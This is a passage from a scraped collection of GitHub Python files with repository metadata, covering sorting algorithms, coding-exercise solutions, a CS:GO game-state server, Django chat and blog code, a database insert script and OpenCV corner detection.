lst[child + 1]: # 左孩子小于右孩子\n child += 1\n if lst[root] < lst[child]: # 根小于孩子,那么交换并继续向下\n lst[root], lst[child] = lst[child], lst[root]\n root = child\n else:\n break\n\n # 从倒数第一层向上,查看是否满足最大堆性质,来创建最大堆\n for start in range((len(lst) - 2) // 2, -1, -1):\n sift_down(start, len(lst) - 1)\n\n # 每次交换最大和队尾元素,并维持堆进行堆排序\n for end in range(len(lst) - 1, 0, -1):\n lst[0], lst[end] = lst[end], lst[0]\n sift_down(0, end - 1)\n return lst\n\n\nif __name__ == \"__main__\":\n l = [9, 2, 1, 7, 6, 8, 5, 3, 4]\n print(heap_sort(l))\n\n","repo_name":"shiyutang/DL-Prep","sub_path":"04_Algorithms/Leetcode/heap sort.py","file_name":"heap sort.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"71293039625","text":"res = 0;\nfor x in range(0, 1000):\n if x%3 ==0 or x%5==0:\n res += x\nprint(res, x)\n\n\n\n\n\"\"\" the following code is for ugly number problem\nres = []\ni3=0\ni5=0\nres.append(1)\nnext3=res[i3]*3\nnext5=res[i5]*5\nwhile res[-1] < 10:\n tmp = min(next3, next5)\n if tmp>10:\n break\n res.append(tmp)\n if tmp == next3:\n i3+=1\n next3 = res[i3]*3\n else:\n i5+=1\n next5 = res[i5]*5\nsumres=0;\nfor x in res:\n sumres += x;\nprint (res);\n\"\"\"\n","repo_name":"haojian/Euler","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8373447629","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nfrom operator import attrgetter\nfrom threading import Thread\nimport json\n\nimport gamestate\nimport payloadparser\n\nclass GSIServer(HTTPServer):\n def __init__(self, server_address, auth_token):\n super(GSIServer, self).__init__(server_address, RequestHandler)\n\n self.auth_token = auth_token\n self.gamestate = gamestate.GameState()\n self.parser = payloadparser.PayloadParser()\n \n self.running = False\n\n def start_server(self):\n try:\n thread = Thread(target=self.serve_forever)\n thread.start()\n first_time = True\n while self.running == False:\n if first_time == True:\n print(\"CS:GO GSI Server starting..\")\n first_time = False\n except:\n print(\"Could not start server.\")\n\n def get_info(self, target, *argv):\n try:\n if len(argv) == 0:\n state = attrgetter(f\"{target}\")(self.gamestate)\n elif len(argv) == 1:\n state = attrgetter(f\"{target}.{argv[0]}\")(self.gamestate)\n elif len(argv) == 2:\n state = attrgetter(f\"{target}.{argv[0]}\")(self.gamestate)[f\"{argv[1]}\"]\n else:\n print(\"Too many arguments.\")\n return False\n if \"object\" in str(state):\n return vars(state)\n else:\n return state\n except Exception as E:\n print(E)\n return False\n\nclass RequestHandler(BaseHTTPRequestHandler):\n def do_POST(self):\n length = int(self.headers[\"Content-Length\"])\n body = self.rfile.read(length).decode(\"utf-8\")\n\n payload = json.loads(body)\n\n if not self.authenticate_payload(payload):\n print(\"auth_token does not match.\")\n return False\n else:\n self.server.running = True\n\n self.server.parser.parse_payload(payload, self.server.gamestate)\n\n def authenticate_payload(self, payload):\n if \"auth\" in payload and \"token\" in payload[\"auth\"]:\n return payload[\"auth\"][\"token\"] == self.server.auth_token\n else:\n return False\n","repo_name":"Erlendeikeland/csgo-gsi-python","sub_path":"csgo-gsi-python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"81"} +{"seq_id":"39017916869","text":"\"\"\"\nStatus -> Solved by myself\n\nTime complexity -> O(N + M)\nSpace complexity -> O(log N)\n\nSolution\n1. nums to list onvertor\n convert number to list of digits \n create nodes from each digit\n2. List to num convertor\n loop through nodes\n on each iteration add number to counter multipled by 10 powered to iteration step\n3. convert lists to nums, add, convert back to list\n\"\"\"\nfrom typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \n def __repr__(self) -> str:\n return f'ListNode(v={self.val}, next={self.next})'\n\n\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n return build_list(from_list_to_num(l1) + from_list_to_num(l2))\n\ndef from_list_to_num(node):\n counter = 0\n multiplier = 1\n while node is not None:\n counter += node.val * multiplier\n multiplier *= 10\n node = node.next\n\n return counter\n\ndef build_list(num):\n num_list = [int(i) for i in str(num)]\n previous_node = None\n for i in num_list:\n node = ListNode(i, previous_node)\n previous_node = node\n\n return previous_node\n\n\nclass Solution2:\n # Time complexity O(N + M)\n # Space complexity O(1)\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n extra = 0\n l1_node = l1\n l2_node = l2\n while l1_node or extra:\n l1_val = l1_node.val if l1_node else 0\n l2_val = l2_node.val if l2_node else 0\n if l1_node:\n l1_node.val = (l1_val + l2_val + extra) % 10\n else:\n l1_node = ListNode((l1_val + l2_val + extra) % 10)\n last_node.next = l1_node\n extra = (l1_val + l2_val + extra) // 10\n\n if l2_node and l1_node.next is None and l2_node.next is not None:\n l1_node.next = l2_node.next\n l2_node.next = None\n\n if l1_node.next is None:\n last_node = l1_node\n l1_node = l1_node.next if l1_node else None\n l2_node = l2_node.next if l2_node else None\n return l1\n\n\nif __name__ == '__main__':\n first = build_list(0)\n second = build_list(37)\n sol = Solution2()\n res = sol.addTwoNumbers(first, second)\n res2 = from_list_to_num(res)\n print(f'Result --> {res2}')\n print(f'Result --> {res}')","repo_name":"mykhailov-my/leetcode","sub_path":"2_add_two_numbers.py","file_name":"2_add_two_numbers.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15029874237","text":"\"\"\"\n# Taking input\nmajor = input(\"Enter your Major: \")\nno_of_credits = int(input(\"Enter the number of credits you are enrolled in: \"))\nyear, gpa = input(\"Enter your Year, GPA: \").split(',')\ngpa = float(gpa)\nprint('You are enrolled in ' + year + ' year in ' + major +\n ' Major. You have currently taken', no_of_credits,\n 'credits and your GPA is ' + str(gpa))\n\"\"\"\n\n# simple if statement\ntest = 67 < 78\nif test:\n print('logical value of test is True')\n\n# simple if-else statement\ncondition = 24 == 56\nif condition:\n print('Condition is True')\nelse:\n print('Condition is False')\n\n# if-elif statements\nnumber = 12\nif (number >= 0) and (number < 10):\n print('Number is in the range 0 to 9')\nelif (number >= 10) and (number < 20):\n print('Number is in the range 10 to 19')\nelif (number >= 20) and (number < 30):\n print('Number is in the range 20 to 29')\nelse:\n print('Number is negative or greater than 29')\n\n\n# for loop\nfor i in range(5):\n print('hello world')\n\n# while loop\ncount = 0\nwhile count < 5:\n print('hello world')\n count += 1\n\n# Break Statement\nfor i in range(5, 10):\n print(i)\n if i == 8:\n break\n\n# Continue Statement\nfor i in range(5, 10):\n if i == 7 or i == 8:\n continue\n print(i)\n\n\n","repo_name":"Ebad8931/PythonWorkshop","sub_path":"02_control_structures.py","file_name":"02_control_structures.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30204166841","text":"con = 0\nne = 0\nwhile con < 5:\n con = con+1\n num = int(input(\"Digite um numéro:\"))\n\n if(num < 0):\n ne = ne+1\n\nprint(\"Total de numéros negativos digitado: %d\" %ne)","repo_name":"work-vitor/Logica-de-Program-o---Python","sub_path":"Lista 3/ex9.py","file_name":"ex9.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25869326079","text":"from django.db import models\nfrom django.dispatch import receiver\nfrom django.utils.crypto import get_random_string\nfrom django.db.models.signals import post_delete, post_save, m2m_changed, pre_delete\nfrom django.conf import settings\n\nfrom accounts.models import User, UserProfile\nfrom projects.models import Task\n\nfrom .helpers import RocketChat\nfrom django.contrib.postgres.fields import JSONField\nfrom django.contrib.postgres.fields.jsonb import KeyTextTransform\nimport sys\nfrom rest_framework import serializers\n\nMESSAGE_TYPE = [('opinion','opinion'),\n ('decisions','decisions'),\n ('argument','argument'),\n ('task','task'),\n ('gut_feeling','gut_feeling'),\n ('decision_poll','decision_poll'),\n ('assumption','assumption'),\n ('suggestion','suggestion'),\n ('thought_experiment','thought_experiment'),\n ('hypothesis','hypothesis')]\n\n\nclass UserChat(models.Model):\n \"\"\"\n Model for chat user data\n \"\"\"\n user = models.OneToOneField(User, related_name='chat')\n username = models.CharField(max_length=32)\n raw_password = models.CharField(max_length=16)\n auth_token = models.CharField(max_length=50, blank=True)\n chat_user_id = models.CharField(max_length=20, blank=True)\n\n\nclass TaskGroup(models.Model):\n \"\"\"\n Model for chat groups data\n \"\"\"\n task = models.OneToOneField(Task)\n group_id = models.CharField(max_length=20)\n title = models.CharField(max_length=100)\n\n\ndef get_chat_user(\n user: User, commit: bool = True, rocket_admin: RocketChat = None\n) -> UserChat:\n \"\"\"\n Function get or create chat user\n \"\"\"\n if user.__str__():\n chat_user, created = UserChat.objects.get_or_create(\n user=user, defaults={\n 'username': user.username,\n 'raw_password': get_random_string(length=16)\n }\n )\n\n if rocket_admin is None:\n rocket_admin = RocketChat(\n settings.ROCKETCHAT_USER,\n settings.ROCKETCHAT_PASSWORD\n )\n\n if chat_user.chat_user_id:\n if not rocket_admin.users_info(chat_user.chat_user_id).json()['success']:\n created = True\n\n if created:\n rocket_user = rocket_admin.users_create(\n email= user.__str__(),\n name=user.first_name,\n password=chat_user.raw_password,\n username=chat_user.username\n )\n chat_user.chat_user_id = rocket_user.json()['user']['_id']\n if commit:\n chat_user.save(update_fields=['chat_user_id'])\n return chat_user\n else:\n raise serializers.ValidationError({\"email\":'Email is Required.'})\n\n\n\n\nclass MessageType(models.Model):\n \"\"\"\n Model for different type of messages for particular chat groups\n \"\"\"\n group_id = models.CharField(max_length=100, blank=True, null=True)\n message_id = models.CharField(max_length=50, blank=True, null=True)\n message_type = models.CharField(choices=MESSAGE_TYPE, max_length=30, blank=True, null=True)\n options = JSONField(blank=True, null=True)\n # options = models.CharField(blank=True, null=True)\n voting = JSONField(blank=True, null=True)\n chat_user_id = models.CharField(max_length=50, blank=True, null=True)\n parent_message_id = models.CharField(max_length=50, blank=True, null=True)\n\n\nclass DecisionPollVote(models.Model):\n \"\"\"\n Model for Decision Poll Voting\n \"\"\"\n message_id = models.CharField(max_length=50, blank=True, null=True)\n options = models.IntegerField(blank=True, null=True)\n chat_user_id = models.CharField(max_length=50, blank=True, null=True)\n\n@receiver(post_save, sender=DecisionPollVote)\ndef calculate_vote(sender, instance, created, **kwargs):\n # if created:\n voters = 0\n message_type_id = MessageType.objects.filter(message_id=instance.message_id).first()\n if message_type_id:\n group_obj = TaskGroup.objects.filter(group_id=message_type_id.group_id).first()\n task_obj = Task.objects.filter(id=group_obj.task.id).first()\n participants = task_obj.participants.all()\n\n if not message_type_id.voting:\n voting = []\n for i in message_type_id.options:\n voting.append({\"id\":i[\"id\"],\"option\":i[\"option\"],\"votes\":0,\"percentage\":0.0})\n message_type_id.voting = voting\n message_type_id.save()\n for i in message_type_id.voting:\n if i[\"id\"] == instance.options:\n i[\"votes\"] += 1\n if len(participants) > 0:\n i[\"percentage\"] = (i[\"votes\"]/len(participants))*100\n message_type_id.save() \n\n@receiver(post_save, sender=Task)\ndef calculate_vote_task(sender, instance, created, **kwargs):\n if not created:\n participants = instance.participants.all()\n group_obj = TaskGroup.objects.filter(task=instance).first()\n if group_obj:\n message_type_obj = MessageType.objects.filter(group_id=group_obj.group_id).first()\n if message_type_obj:\n if not message_type_obj.voting:\n voting = []\n if message_type_obj.options:\n for i in message_type_obj.options:\n voting.append({\"id\":i[\"id\"],\"option\":i[\"option\"],\"votes\":0,\"percentage\":0.0})\n message_type_obj.voting = voting\n message_type_obj.save()\n if message_type_obj.voting:\n for i in message_type_obj.voting:\n if len(participants) > 0:\n i[\"percentage\"] = (i[\"votes\"]/len(participants))*100\n message_type_obj.save()\n\n\n# We need exclude chat signals from tests\nif 'test' not in sys.argv:\n\n @receiver(post_delete, sender=User)\n def handler_delete_user(sender, instance, **kwargs):\n \"\"\"\n Signal delete user from chat\n \"\"\"\n rocket_admin = RocketChat(\n settings.ROCKETCHAT_USER,\n settings.ROCKETCHAT_PASSWORD\n )\n rocket_admin.users_delete(instance.chat.chat_user_id)\n\n\n @receiver(post_save, sender=User)\n @receiver(post_save, sender=UserProfile)\n def handler_user_update_data(sender, instance, **kwargs):\n \"\"\"\n Signal update user data when user update his profile\n \"\"\"\n if sender == User:\n user = instance\n else:\n user = instance.user\n\n try:\n chat_user = UserChat.objects.get(user=user)\n if chat_user.username != user.username:\n chat_user.username = user.username\n chat_user.save(update_fields=['username'])\n except UserChat.DoesNotExist:\n pass\n\n\n @receiver(pre_delete, sender=Task)\n def handler_task_delete_channel(sender, instance, **kwargs):\n \"\"\"\n Signal delete chat group and task group data\n \"\"\"\n rocket_admin = RocketChat(\n settings.ROCKETCHAT_USER,\n settings.ROCKETCHAT_PASSWORD\n )\n\n for participant in instance.participants.all():\n chat_user = get_chat_user(participant, rocket_admin=rocket_admin)\n rocket = RocketChat(\n headers={\n 'X-Auth-Token': chat_user.auth_token,\n 'X-User-Id': chat_user.chat_user_id\n }\n )\n try:\n task_group = TaskGroup.objects.get(task=instance)\n rocket.groups_close(task_group.group_id)\n message_type_ids = MessageType.objects.filter(group_id=task_group.group_id).values_list('message_id',flat=True)\n decision_poll_obj = DecisionPollVote.objects.filter(message_id__in=message_type_ids)\n decision_poll_obj.delete()\n message_type_obj = MessageType.objects.filter(group_id=task_group.group_id)\n message_type_obj.delete()\n task_group.delete()\n except TaskGroup.DoesNotExist:\n pass\n\nclass DirectGroup(models.Model):\n \"\"\"\n Model for Direct Group data\n \"\"\"\n group_id = models.CharField(max_length=100)\n participant1 = models.CharField(max_length=100)\n participant2 = models.CharField(max_length=100)\n\n\n# @receiver(m2m_changed, sender=Task.participants.through)\n# def handler_change_task_participants(sender, instance, action, **kwargs):\n# \"\"\"\n# Signal update chat group participants\n# \"\"\"\n# if action in ['post_add', 'post_remove']:\n# rocket_admin = RocketChat(\n# settings.ROCKETCHAT_USER,\n# settings.ROCKETCHAT_PASSWORD\n# )\n\n# for user in User.objects.filter(pk__in=list(kwargs['pk_set'])):\n# chat_user = get_chat_user(user, rocket_admin=rocket_admin)\n\n# try:\n# group = TaskGroup.objects.get(task=instance)\n# except TaskGroup.DoesNotExist:\n# return\n\n# if action == 'post_add':\n# rocket_admin.groups_invite(\n# group.group_id, chat_user.chat_user_id\n# )\n\n# if action == 'post_remove':\n# rocket_admin.groups_kick(\n# group.group_id, chat_user.chat_user_id\n# )\n","repo_name":"superdev317/management_plan_backend","sub_path":"chat/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29102488018","text":"# encoding: utf-8\n\nfrom requests_toolbelt import MultipartEncoder\nimport requests\n\nhost='http://112.74.112.220:8083'#禅道服务器地址\n\ndef login(s,user=\"laraine\",psw=\"e10adc3949ba59abbe56e057f20f883e\"):\n u\"登录禅道\"\n loginUrl=host+\"/user-login.html\"\n h={\n \"Connection\":\"keep-alive\",\n \"Content-Length\":\"120\",\n \"Cache-Control\":\"max-age=0\",\n \"Origin\":\"http://112.74.112.220:8083\",\n \"Upgrade-Insecure-Requests\":\"1\",\n \"Content-Type\":\"application/x-www-form-urlencoded\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n # \"Referer\":\"http://112.74.112.220:8083/user-login.html\",\n \"Accept-Encoding\":\"gzip, deflate\",\n \"Accept-Language\":\"en,zh-CN;q=0.9,zh;q=0.8\",\n\n }\n\n boby={\n \"account\":user,\n \"password\":psw,\n \"Referer\":host+\"/my/\"\n }\n\n try:\n r=s.port(loginUrl,data=boby,hearder=h)\n print(r.content)#打印结果看到location=‘host+\"/my/\"说明登录成功了\n if \"/my/in r.content\":\n print(\"登录成功了\")\n return True\n else:\n print(\"登录失败:%s\"%r.content)\n return False\n except Exception as msg:\n print(\"登录失败:%s\"%str(msg))\n return False\n\n # def upload_jpg(s):\n # u\"上传图片\"\n # url=\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"laraine7/appium","sub_path":"interface/05_requests-toolbelt处理multipart.py","file_name":"05_requests-toolbelt处理multipart.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11371891015","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Fri Feb 18 2022\n\n@author: Carlos Páez\n'''\n\n\ndef solveMeFirst(a, b):\n \"\"\"\n Given two integers, return their sum\n \n :param a: the first number\n :param b: the second number\n :return: The sum of the two numbers.\n \"\"\"\n if 1 <= a and b <= 1000:\n return a + b\n return '1 <= a, b <= 1000'\n\n\nnum1 = int(input())\nnum2 = int(input())\n\nres = solveMeFirst(num1, num2)\nprint(res)\n","repo_name":"carlos-paezf/HackerRank_Algorithms","sub_path":"Python/01-Solve_Me_First.py","file_name":"01-Solve_Me_First.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"485315930","text":"from django.db.models import F, Q\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom django.views.decorators.cache import cache_page\nfrom django.views import generic\n# from django.views.generic import TemplateView, ListView\n\nfrom . models import Category, Article\n\n\n# @cache_page(60 * 2)\ndef index(request):\n title = 'Hlavni stranka'\n context = {\n 'title': title,\n }\n return render(request, 'blog/index.html', context)\n\n\n# @cache_page(60)\ndef blog(request):\n title = 'Blog'\n articles = Article.objects.filter(is_published=True).select_related()\n paginator = Paginator(articles, 3)\n page_number = request.GET.get('page', 1)\n page_obj = paginator.get_page(page_number)\n context = {\n 'title': title,\n 'page_obj': page_obj,\n }\n return render(request, 'blog/blog.html', context)\n\n\n# @cache_page(60)\ndef get_category(request, category_id):\n # category = Category.objects.raw('SELECT * FROM category')\n articles = Article.objects.filter(category=category_id,\n is_published=True).select_related('category')\n context = {\n # 'category': category,\n 'articles': articles,\n }\n return render(request, 'blog/category.html', context)\n\n\n# @cache_page(60)\ndef get_article(request, article_id):\n article = get_object_or_404(Article.objects.select_related(),\n id=article_id,\n is_published=True,\n )\n article.views = F('views') + 1\n article.save()\n context = {\n 'article': article,\n }\n return render(request, 'blog/article.html', context)\n\n\n# class ViewArticle(generic.DetailView):\n# model = Article\n \n\n# @cache_page(60 * 2)\ndef about(request):\n title = 'O Mne'\n return render(request, 'blog/about.html', {'title': title})\n\n\n# @cache_page(60 * 2)\ndef contacts(request):\n title = 'Kontakty'\n return render(request, 'blog/contacts.html', {'title': title})\n\n\ndef certificates(request):\n title = 'Certifikáty'\n return render(request, 'blog/certificates.html', {'title': title})\n\n\ndef search_page(request):\n if request.method == 'POST':\n q = request.POST.get('search') if request.POST.get('search') is not None else ''\n\n articles = Article.objects.filter(Q(title__icontains=q, is_published=True) |\n Q(category__title__icontains=q, is_published=True) |\n Q(content__icontains=q, is_published=True)\n )\n\n return render(request,\n 'blog/search_page.html',\n {'articles': articles, 'q': q}\n )\n else:\n return render(request,\n 'blog/search_page.html',\n # context\n )\n\n ","repo_name":"Mrhetsko/psy2","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73095016585","text":"import uuid\nimport urlparse\nimport urllib\n\nfrom flask import g, request\n\nfrom mqetables import enrichment\nfrom mqe import util\nfrom mqe import reports\nfrom mqe import serialize\n\nfrom mqeapi import apiconfig\nfrom mqeapi import responses\n\n\ndef set_query_param(url, param_name, param_value):\n pr = urlparse.urlparse(url)\n params_dict = urlparse.parse_qs(pr.query)\n params_dict[param_name] = param_value\n pr = pr._replace(query=urllib.urlencode(params_dict, True))\n return urlparse.urlunparse(pr)\n\ndef href(path):\n return apiconfig.BASE_URL_API + path\n\ndef to_id(uuid):\n return uuid.hex\n\ndef parse_id(s):\n if not s or not s.strip():\n return None\n try:\n return uuid.UUID(s)\n except ValueError:\n raise responses.ExceptionalResponse.bad_request('Invalid id format <%s>' % s)\n\ndef parse_datetime(s):\n if s is None or not s.strip():\n return None\n ev = enrichment.EnrichedValue(s)\n res = ev.optimistic_as_datetime\n if res is None:\n raise responses.ExceptionalResponse.bad_request('Invalid datetime <%s>' % s)\n return res\n\ndef parse_tags(s):\n if s is None:\n return None\n if s == '':\n return []\n tags = s.split(',')\n tags = [t for t in tags if t.strip()]\n return util.uniq_sameorder(tags)\n\ndef parse_int_tags(s):\n tags = parse_tags(s)\n if tags is None:\n return None\n\n res = []\n for x in tags:\n try:\n res.append(int(x))\n except ValueError:\n pass\n return res\n\ndef parse_bool(s):\n if not s:\n return None\n s = s.lower().strip()\n if s in {'', '0', 'false', 'f', 'no'}:\n return 0\n if s in {'1', 'true', 't', 'yes'}:\n return 1\n try:\n return int(s)\n except ValueError:\n raise responses.ExceptionalResponse.bad_request('Invalid bool/number format <%s>' % s)\n\ndef parse_int(s):\n if not s:\n return None\n try:\n return int(s)\n except ValueError:\n raise responses.ExceptionalResponse.bad_request('Invalid integer format <%s>' % s)\n\ndef parse_string(s, max_len=None):\n if not s or not s.strip():\n return None\n s = s.strip()\n if max_len is not None and len(s) > max_len:\n raise responses.ExceptionalResponse.bad_request('Value too long <%s>' % s)\n return s\n\ndef parse_enum(s, enum_values):\n val = parse_string(s)\n if not val:\n return None\n if val not in enum_values:\n raise responses.ExceptionalResponse.bad_request('Invalid value <%s>, must be one of: %s' % (\n val, ', '.join('<%s>' % ev for ev in enum_values)))\n return val\n\ndef parse_json(s):\n if not s or not s.strip():\n return None\n try:\n return serialize.json_loads(s)\n except:\n raise responses.ExceptionalResponse.bad_request('Invalid json value <%s>' % s)\n\n\ndef get_report(name):\n report = reports.Report.select_by_name(g.owner_id, name)\n if not report:\n raise responses.ExceptionalResponse(responses.ApiResponse(404, message='Report <%s> not found' % name))\n return report\n\ndef get_report_instance(report, report_instance_id):\n ri = report.fetch_single_instance(report_instance_id)\n if not ri:\n raise responses.ExceptionalResponse(responses.ApiResponse(404, message='Report instance with id <%s> not found' % to_id(report_instance_id)))\n return ri\n\ndef get_limit():\n limit = parse_int(request.args.get('limit'))\n if limit is None:\n limit = apiconfig.DEFAULT_GET_LIMIT\n\n if not 1 <= limit <= apiconfig.MAX_GET_LIMIT:\n raise responses.ExceptionalResponse(responses.ApiResponse(400, message='Invalid limit <%s>: must be between 1 and %s' % (limit, apiconfig.MAX_GET_LIMIT)))\n return limit\n\ndef client_ip():\n ff = request.headers.get('x-forwarded-for')\n if not ff:\n return request.remote_addr\n ff = ff.replace(' ', '')\n return ff.split(',', 1)[0]\n\n\n","repo_name":"ighori/monique-api","sub_path":"mqeapi/apiutil.py","file_name":"apiutil.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19043773703","text":"\n# Selection sort in Python\n# time complexity O(n*n)\n#sorting by finding min_index\n\nimport random\nimport time\n\n\ndef selection_sort(L):\n # i indicates how many items were sorted\n for i in range(len(L)):\n # To find the minimum value of the unsorted segment\n # We first assume that the first element is the lowest\n min_index = i\n # We then use j to loop through the remaining elements\n for j in range(i+1, len(L)):\n # Update the min_index if the element at j is lower than it\n if L[j] < L[min_index]:\n min_index = j\n # After finding the lowest item of the unsorted regions, swap with the first unsorted item\n L[i], L[min_index] = L[min_index], L[i]\n\nrandomlist = random.sample(range(-1000, 1000), 100)\n# print(randomlist)\nstart_time = time.time_ns()\nselection_sort(randomlist)\nprint(\"It took %s micro seconds ---\" % round((time.time_ns() - start_time)/1000))\n# print('The array after sorting in Ascending Order by selection sort is:')\n# print(randomlist)\n","repo_name":"chutieu312/sorting","sub_path":"selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71524322824","text":"import os\nimport sys\nfrom typing import Dict\nimport pandas as pd\nimport psycopg2\nfrom dotenv import load_dotenv\nimport logging\n\nlogging.basicConfig()\nlogging.getLogger(\"sqlalchemy.engine\").setLevel(logging.DEBUG)\n\nload_dotenv()\n\ndf = pd.read_csv(\"cluster-data.csv\", delimiter=\";\", decimal=\",\")\n\ndf[[\"artist\", \"track_name\"]] = df[[\"artist\", \"track_name\"]].astype(str)\nprint(df.dtypes)\nprint(df.loc[1:1])\n\ndb_credentials = {\n \"dbname\": os.environ[\"DBNAME\"],\n \"user\": os.environ[\"DBUSER\"],\n \"password\": os.environ[\"DBPASS\"],\n \"host\": os.environ[\"DBHOST\"],\n}\n\n\ndef connect(credentials: Dict):\n\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n\n conn = None\n try:\n print(\"Connecting to the PostgreSQL database...\")\n conn = psycopg2.connect(**credentials)\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n sys.exit(1)\n print(\"Connection successful\")\n return conn\n\n\ndef execute_many(conn, df, table):\n\n \"\"\"\n Using cursor.executemany() to insert the dataframe\n \"\"\"\n\n tuples = [tuple(x) for x in df.to_numpy()]\n cols = \",\".join(list(df.columns))\n query = \"INSERT INTO %s(%s) VALUES(%%s,%%s,%%s,%%s,%%s,%%s)\" % (table, cols)\n cursor = conn.cursor()\n try:\n cursor.executemany(query, tuples)\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n conn.rollback()\n cursor.close()\n return 1\n print(\"execute_many() done\")\n cursor.close()\n\n\nconn = connect(db_credentials)\nexecute_many(conn, df, \"resume_clusterdata\")\n","repo_name":"danielsteman/resume","sub_path":"data/inject_data.py","file_name":"inject_data.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19640587951","text":"import spacy\nimport yaml\nimport pandas as pd\n\n\ndef load_config():\n with open('src/config.yml', 'r') as f:\n config = yaml.safe_load(f)\n return config\n\ndef load_and_lemmatize_keywords():\n config = load_config()\n\n keywords = pd.read_csv(config[\"keywords_path\"], header=None)\n keywords = list(keywords.iloc[:,0])\n\n nlp = spacy.load(\"pl_core_news_md\")\n lemmatized_keywords = [' '.join([token.lemma_ for token in nlp(phrase)]) for phrase in keywords]\n\n return keywords, lemmatized_keywords\n\ndef lemmatize_description(description):\n nlp = spacy.load(\"pl_core_news_md\")\n\n description_lemmatized = ' '.join([token.lemma_ for token in nlp(description)])\n\n return description_lemmatized\n\ndef count_keywords(keywords, lem_keywords, desc_lem):\n counts = {}\n\n for phrase_lem, phrase in zip(lem_keywords, keywords):\n if phrase_lem in desc_lem:\n counts[phrase] = counts.get(phrase, 0) + desc_lem.count(phrase_lem)\n\n return counts\n\ndef process_description(descriptions):\n keywords, lemmatized_keywords = load_and_lemmatize_keywords()\n counts = []\n\n for desc in descriptions:\n counts.append(count_keywords(keywords,\n lemmatized_keywords,\n lemmatize_description(desc)))\n\n return counts\n","repo_name":"jmstepka/fake-job-hunter-model","sub_path":"src/keyword_analysis.py","file_name":"keyword_analysis.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28675335018","text":"# # The Joy of Computing using Python Week 12 (04 Dec 2020)\n\n\n# Write a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\n\n# Input Format:\n# The first line of the input contains a statement.\n\n# Output Format:\n# Print the number of upper case and lower case respectively separated by a space.\n\n# Example:\n\n# Input:\n# Hello world!\n\n# Output:\n# 1 9\n\n\nn = input()\nu = 0\nl = 0\nfor i in n:\n if i.isupper():\n u += 1\n elif i.islower():\n l += 1\nprint(u, l, end = '')\n","repo_name":"jaygohil15/NPTEL","sub_path":"The Joy of computing using python/Week 12 Ass. 2 - Letters.py","file_name":"Week 12 Ass. 2 - Letters.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7295467704","text":"szFileNmae = \"/Users/51pwn/MyWork/mybugbounty/ai/i1.jpg\"\n\nimport numpy as np \nimport cv2 \nfrom matplotlib import pyplot as plt \n \n \n# read the image \nimg = cv2.imread(szFileNmae) \n \n# convert image to gray scale image \ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \n \n# detect corners with the goodFeaturesToTrack function. \ncorners = cv2.goodFeaturesToTrack(gray, 27, 0.01, 10) \ncorners = np.int0(corners) \n \n# we iterate through each corner, \n# making a circle at each point that we think is a corner. \nfor i in corners: \n x, y = i.ravel() \n cv2.circle(img, (x, y), 3, 255, -1)\n\n(h,w) = img.shape[:2]\n\npts1=np.float32([[0,0],[0,h],[w,0],[w,h]])\npts2=np.float32([(7.17803, 6.05628),(67.6975,198.332),(209.54, 50.1851),(231.604, 226.7)])\n\nm = cv2.getPerspectiveTransform(pts2,pts1)\nimg = cv2.warpPerspective(img,m,(w,h))\n\ncv2.imshow('Perspective', img)\nplt.imshow(img), 